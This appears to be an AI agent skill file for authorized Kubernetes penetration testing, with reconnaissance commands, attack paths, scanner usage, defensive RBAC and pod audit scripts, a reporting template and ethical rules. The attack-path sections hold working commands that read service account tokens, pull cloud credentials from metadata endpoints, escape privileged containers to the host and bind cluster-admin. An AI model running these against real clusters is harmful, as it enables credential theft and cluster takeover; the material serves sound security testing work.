k8s-security-redteam

Kubernetes Security Red Team

Perform offensive security testing of Kubernetes platforms including penetration testing, attack paths, and vulnerability assessment.

Keywords

kubernetes, security, red team, penetration testing, pentest, attack, exploiting, exploit, privilege escalation, container escape, rbac, secrets, vulnerability, assessment, offensive, conducting, performing, running, testing, identifying, validating

When to Use This Skill

  • Conducting authorized penetration tests
  • Performing security assessments
  • Running red team exercises
  • Testing security controls
  • Identifying attack paths
  • Validating hardening measures
IMPORTANT: Only use these techniques on systems you have explicit written authorization to test.

Related Skills

  • k8s-security-hardening - What defenses to test
  • k8s-platform-tenancy - Tenant isolation to test
  • k8s-platform-operations - Incident response after findings
  • k8s-continual-improvement - Track security debt
  • k8s-namespace-troubleshooting - Diagnose exploited namespaces
  • Shared: RBAC Patterns - RBAC to audit

Quick Reference

  • Check permissions: kubectl auth can-i --list
  • Find privileged pods: kubectl get pods -A -o json | jq '.items[] | select(.spec.containers[].securityContext.privileged==true)'
  • List secrets: kubectl get secrets -A
  • Test anonymous access: kubectl --as=system:anonymous auth can-i --list

Attack Surface

External

  • Kubernetes API (TCP 6443)
  • Ingress controllers (TCP 80, 443)
  • NodePort services (TCP 30000-32767)
  • Exposed dashboards
  • Cloud metadata endpoints

Internal (from compromised pod)

  • Service account tokens
  • Secrets in environment/volumes
  • Network connectivity
  • Mounted volumes
  • Cloud IMDS

Reconnaissance

External

bash
# Port scan
nmap -sV -p 6443,443,80,30000-32767 ${TARGET}

# Check anonymous access
curl -k https://${API_SERVER}:6443/api/v1/namespaces

# Test anonymous auth
kubectl --server=https://${API}:6443 --insecure-skip-tls-verify auth can-i --list

Internal (from pod)

bash
# Current permissions
kubectl auth can-i --list

# SA token location
cat /var/run/secrets/kubernetes.io/serviceaccount/token

# Enumerate
kubectl get namespaces
kubectl get secrets -A
kubectl get pods -A -o wide

Attack Paths

1. Service Account Token Abuse

bash
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
APISERVER=https://kubernetes.default.svc

curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
  $APISERVER/api/v1/namespaces/default/secrets

2. Privileged Container Escape

bash
# Mount host filesystem
mkdir /host && mount /dev/sda1 /host
chroot /host

# Or nsenter
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash

3. RBAC Escalation

bash
# Check dangerous permissions
kubectl auth can-i escalate roles
kubectl auth can-i bind clusterroles
kubectl auth can-i impersonate users
kubectl auth can-i create pods/exec

# Escalate if can create rolebindings
kubectl create rolebinding pwn --clusterrole=cluster-admin --user=$(whoami)

4. Cloud Metadata Exploitation

AWS:
bash
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
GCP:
bash
curl -H "Metadata-Flavor: Google" \
  http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token
Azure:
bash
curl -H "Metadata: true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

Cloud-Specific Attacks

AWS EKS

  • IRSA token theft from projected SA volumes
  • Node IAM role abuse via IMDS
  • aws-auth ConfigMap manipulation
  • EKS cluster role misconfiguration

GCP GKE

  • Workload Identity token theft
  • Metadata concealment bypass
  • GKE node service account abuse
  • Anthos Config Management exploitation

Azure AKS

  • Azure AD Pod Identity abuse
  • Managed Identity exploitation
  • AKS RBAC misconfiguration
  • Key Vault access via MI

Vulnerability Assessment Tools

Installation

bash
# kubescape
brew install kubescape

# trivy (includes cluster scanning, image scanning, and k8s misconfiguration detection)
brew install trivy

> **Note**: kube-hunter (formerly by Aqua Security) has been deprecated and is no longer maintained. Use `trivy k8s` for equivalent cluster vulnerability scanning.

Running Scans

bash
# kubescape
kubescape scan framework nsa,mitre

# trivy cluster scan (replaces kube-hunter)
trivy k8s --report summary cluster

# trivy targeted scan
trivy k8s --namespace ${NAMESPACE} --report all

Testing Checklist

Authentication

  • Anonymous API access
  • Default dashboard credentials
  • Weak service account tokens
  • Missing token expiration

Authorization

  • Overly permissive RBAC
  • Privilege escalation paths
  • Cross-namespace access
  • Wrong secret access
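
The permissions probed under "RBAC Escalation" can also be found from the defender's side by reviewing role definitions. The following is an added example, not part of the original skill: a Python audit over the JSON produced by `kubectl get roles,clusterroles -A -o json`; the function names and the sample roles are constructed for illustration, and `resourceNames` restrictions are ignored.

```python
RBAC = "rbac.authorization.k8s.io"
# (apiGroup, verb, resource) triples: the permissions probed under
# "RBAC Escalation", plus secret reads from the Authorization checklist.
DANGEROUS = [
    (RBAC, "escalate", "roles"), (RBAC, "escalate", "clusterroles"),
    (RBAC, "bind", "roles"), (RBAC, "bind", "clusterroles"),
    (RBAC, "create", "rolebindings"), (RBAC, "create", "clusterrolebindings"),
    ("", "impersonate", "users"), ("", "create", "pods/exec"),
    ("", "get", "secrets"), ("", "list", "secrets"),
]

def matches(granted, wanted):
    """RBAC list semantics: '*' matches everything, otherwise exact match."""
    return "*" in granted or wanted in granted

def resource_matches(granted, wanted):
    """Like matches(), but also honours the '*/subresource' form (e.g. '*/exec')."""
    if matches(granted, wanted):
        return True
    return "/" in wanted and "*/" + wanted.split("/", 1)[1] in granted

def audit_roles(role_list):
    """Return sorted (kind, namespace, name, verb, resource) findings."""
    findings = set()
    for role in role_list.get("items", []):
        meta = role.get("metadata", {})
        for rule in role.get("rules") or []:  # aggregated roles may have null rules
            for group, verb, resource in DANGEROUS:
                if (matches(rule.get("apiGroups", []), group)
                        and matches(rule.get("verbs", []), verb)
                        and resource_matches(rule.get("resources", []), resource)):
                    findings.add((role.get("kind", "Role"), meta.get("namespace", ""),
                                  meta.get("name", ""), verb, resource))
    return sorted(findings)

# Constructed sample, shaped like `kubectl get roles,clusterroles -A -o json`.
SAMPLE = {"items": [
    {"kind": "Role", "metadata": {"namespace": "team-a", "name": "debugger"},
     "rules": [{"apiGroups": [""], "resources": ["pods", "pods/exec"],
                "verbs": ["get", "create"]}]},
    {"kind": "ClusterRole", "metadata": {"name": "binder"},
     "rules": [{"apiGroups": [RBAC], "resources": ["clusterroles"], "verbs": ["bind"]}]},
    {"kind": "ClusterRole", "metadata": {"name": "secrets-wild"},
     "rules": [{"apiGroups": [""], "resources": ["*"], "verbs": ["list"]}]},
    {"kind": "Role", "metadata": {"namespace": "team-a", "name": "viewer"},
     "rules": [{"apiGroups": [""], "resources": ["configmaps"], "verbs": ["get"]}]},
]}

if __name__ == "__main__":
    for finding in audit_roles(SAMPLE):
        print(*finding, sep="\t")
```

A finding means the role grants the permission; who actually holds it depends on the RoleBindings and ClusterRoleBindings that reference the role, which this audit does not resolve.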

Network

  • Missing network policies
  • Unrestricted pod traffic
  • Metadata endpoint access
  • External exposure

Container

  • Privileged containers
  • Host namespace access
  • Writable root filesystem
  • Capabilities not dropped
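
The four Container items can be checked in one pass over a pod listing. The following is an added example, not part of the original skill: a Python audit over the JSON produced by `kubectl get pods -A -o json` that, unlike the Quick Reference one-liner, also covers init and ephemeral containers. The function name and sample pods are constructed, and "capabilities not dropped" is taken to mean the absence of `drop: [ALL]`, which is an assumption.

```python
def audit_pods(pod_list):
    """Return sorted (namespace, pod, container, issue) findings for the four
    Container checklist items; container is "-" for pod-level settings."""
    findings = []
    for pod in pod_list.get("items", []):
        meta, spec = pod.get("metadata", {}), pod.get("spec", {})
        ns, name = meta.get("namespace", "default"), meta.get("name", "")
        # Host namespace access is set on the pod, not on a container.
        for field in ("hostNetwork", "hostPID", "hostIPC"):
            if spec.get(field):
                findings.append((ns, name, "-", field))
        # Init and ephemeral containers carry their own securityContext,
        # so they are checked alongside the regular containers.
        containers = []
        for key in ("containers", "initContainers", "ephemeralContainers"):
            containers += spec.get(key) or []
        for c in containers:
            sc = c.get("securityContext") or {}
            if sc.get("privileged"):
                findings.append((ns, name, c["name"], "privileged"))
            if not sc.get("readOnlyRootFilesystem"):
                findings.append((ns, name, c["name"], "writable-rootfs"))
            # Assumption: "dropped" means drop: [ALL] is present.
            drops = (sc.get("capabilities") or {}).get("drop") or []
            if "ALL" not in (d.upper() for d in drops):
                findings.append((ns, name, c["name"], "caps-not-dropped"))
    return sorted(findings)

# Constructed sample, shaped like `kubectl get pods -A -o json`.
HARDENED = {"readOnlyRootFilesystem": True, "capabilities": {"drop": ["ALL"]}}
SAMPLE = {"items": [
    {"metadata": {"namespace": "monitoring", "name": "node-agent"},
     "spec": {"hostPID": True,
              "containers": [{"name": "agent",
                              "securityContext": {"privileged": True}}]}},
    {"metadata": {"namespace": "shop", "name": "web"},
     "spec": {"containers": [{"name": "app", "securityContext": HARDENED}],
              "initContainers": [{"name": "init-perms",
                                  "securityContext": {**HARDENED, "privileged": True}}]}},
]}

if __name__ == "__main__":
    for finding in audit_pods(SAMPLE):
        print(*finding, sep="\t")
```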

MITRE ATT&CK Mapping

| Technique | ID | Test |
|---|---|---|
| Valid Accounts | T1078 | Token leakage |
| Container Admin | T1609 | kubectl exec |
| Escape to Host | T1611 | Privileged abuse |
| Credential Access | T1555 | Secret enumeration |
| Lateral Movement | T1021 | Pod-to-pod access |

Reporting

Finding Template

markdown
[CRITICAL/HIGH/MEDIUM/LOW] Finding Title

Description: What the vulnerability is
Impact: What an attacker could do
Evidence:
  • Commands and output
Affected Resources:
  • Specific resources
Remediation:
  1. Immediate fix
  2. Long-term solution
References:
  • CIS control
  • MITRE technique

Common Mistakes

| Mistake | Why It Fails | Instead |
|---|---|---|
| Testing production clusters without written scope document | Causes unplanned outages; legal and compliance exposure | Get explicit written authorization defining scope, timing, and boundaries |
| Exploiting a vulnerability without documenting the steps | Finding cannot be reproduced or verified; remediation team cannot confirm fix | Record exact commands and outputs as you go |
| Leaving privileged pods or RoleBindings after testing | Attackers can reuse your test artifacts as real attack vectors | Clean up all artifacts immediately after each test phase |
| Assuming RBAC is the only access control | Network-level access, cloud IAM, and metadata endpoints bypass RBAC entirely | Test all attack surfaces: RBAC, network, cloud IMDS, runtime |
| Running scans at peak traffic hours | Scanning generates load; may trigger alerts and degrade user experience | Schedule intensive scans during maintenance windows |

Ethical Guidelines

  1. Written authorization required before testing
  2. Scope clearly defined and respected
  3. No production data exfiltration
  4. Report all findings responsibly
  5. Clean up any artifacts created
  6. Document everything for reproducibility